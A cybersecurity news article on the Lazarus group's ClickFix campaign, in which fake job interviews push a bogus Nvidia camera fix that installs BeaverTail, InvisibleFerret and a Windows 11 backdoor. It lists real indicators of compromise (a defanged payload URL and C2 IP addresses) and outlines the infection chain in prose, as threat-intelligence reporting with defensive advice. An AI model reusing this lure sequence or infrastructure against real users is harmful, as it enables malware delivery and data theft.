Lazarus APT Deploys ClickFix Technique to Exfiltrate Sensitive Intelligence Data

The notorious Lazarus APT group, suspected of having Northeast Asian origins and internally tracked as APT-Q-1 by Qi’anxin, has evolved its attack methodologies by incorporating the sophisticated ClickFix social engineering technique into their cyber espionage operations.

This development represents a significant escalation in the group’s capabilities to deceive victims and steal sensitive intelligence data through increasingly deceptive means.

Lazarus gained international notoriety following its devastating 2014 attack on Sony Pictures, though the group’s malicious activities trace back to 2007.

Initially focused on targeting government agencies to extract sensitive intelligence, Lazarus expanded its scope after 2014 to include global financial institutions, cryptocurrency exchanges, and other high-value targets.

The group has consistently employed fake social media accounts disguised as legitimate job opportunities to launch targeted phishing campaigns against individuals in specific industries.

ClickFix represents a modern social engineering attack vector that exploits human psychology by presenting victims with fabricated technical problems.

Attackers display non-existent system faults and manipulate victims into following specific instructions to “resolve” these issues.

The victim unknowingly executes what appears to be a legitimate fix but is actually disguised malicious code.

Lazarus has seamlessly integrated ClickFix tactics into their phishing operations using fraudulent job postings as initial lure mechanisms. The attack sequence follows a carefully orchestrated pattern:

Attack Vector and Execution

Victims receive enticing fake job offers that direct them to attacker-controlled interview websites.

During the simulated interview process, the malicious site strategically prompts users that their camera configuration is inadequate or malfunctioning.

The site then provides a “solution” that appears to be a legitimate Nvidia software update but actually serves as a delivery mechanism for sophisticated malware.

Recent analysis by the Qi’anxin Threat Intelligence Center uncovered a batch script directly linked to Lazarus ClickFix operations that downloads fraudulent Nvidia software packages.

This malware package subsequently deploys a Node.js environment to execute the BeaverTail malware, a signature tool commonly utilized by the Lazarus organization.

The attack chain begins with ClickFix-1.bat, which downloads a malicious compressed package from hxxps://driverservices.store/visiodrive/nvidiaRelease.zip.

The package contains multiple components including run.vbs, shell.bat, main.js (BeaverTail stealer), and drvUpdate.exe (a backdoor specifically targeting Windows 11 systems).

The run.vbs script performs system reconnaissance, checking if the operating system BuildNumber reaches 22000 (Windows 11 identifier) before executing the backdoored drvUpdate.exe.

It also verifies Node.js installation status to determine the appropriate execution path for subsequent malicious scripts.

This campaign demonstrates cross-platform capabilities, affecting both Windows and macOS systems.

For macOS targets, attackers utilize variants disguised as arm64-fixer packages, maintaining the same deceptive approach while adapting to different operating system architectures.

Advanced Persistent Mechanisms

The BeaverTail malware serves as the primary intelligence gathering component, connecting to command and control servers at hxxp://45.159.248.110.

This cross-platform stealer subsequently downloads and deploys the InvisibleFerret Python Trojan, establishing persistent access through registry modifications and scheduled tasks.

For Windows 11 systems, the drvUpdate.exe backdoor provides attackers with comprehensive system control capabilities, including command execution, file manipulation, and system information collection.

The backdoor connects to 103.231.75.101:8888 and supports various instruction codes for different malicious operations.

Security researchers attribute these samples to Lazarus based on code similarities with previously documented campaigns and the deployment of signature malware families including BeaverTail and InvisibleFerret.

By sending a challenge message to the C2 server and comparing the received data, it is determined whether the server can be connected normally.

The group’s consistent use of fake driver updates and social engineering techniques reinforces this attribution assessment.

Defense Recommendations

Organizations and individuals should implement comprehensive security measures including user education about social engineering tactics, email security filtering, and endpoint detection systems.

Users must exercise extreme caution when prompted to download or execute software from unfamiliar websites, particularly during online interviews or recruitment processes.

Multi-factor authentication, regular security awareness training, and incident response planning remain critical components of effective defense strategies against sophisticated APT groups like Lazarus.

Security teams should monitor for indicators of compromise associated with ClickFix techniques and maintain updated threat intelligence feeds to identify emerging attack patterns.

The evolution of Lazarus tactics demonstrates the persistent threat posed by state-sponsored cyber espionage groups and underscores the importance of maintaining robust cybersecurity postures across both corporate and individual environments.

Find this Story Interesting! Follow us on LinkedIn and X to Get More Instant Updates.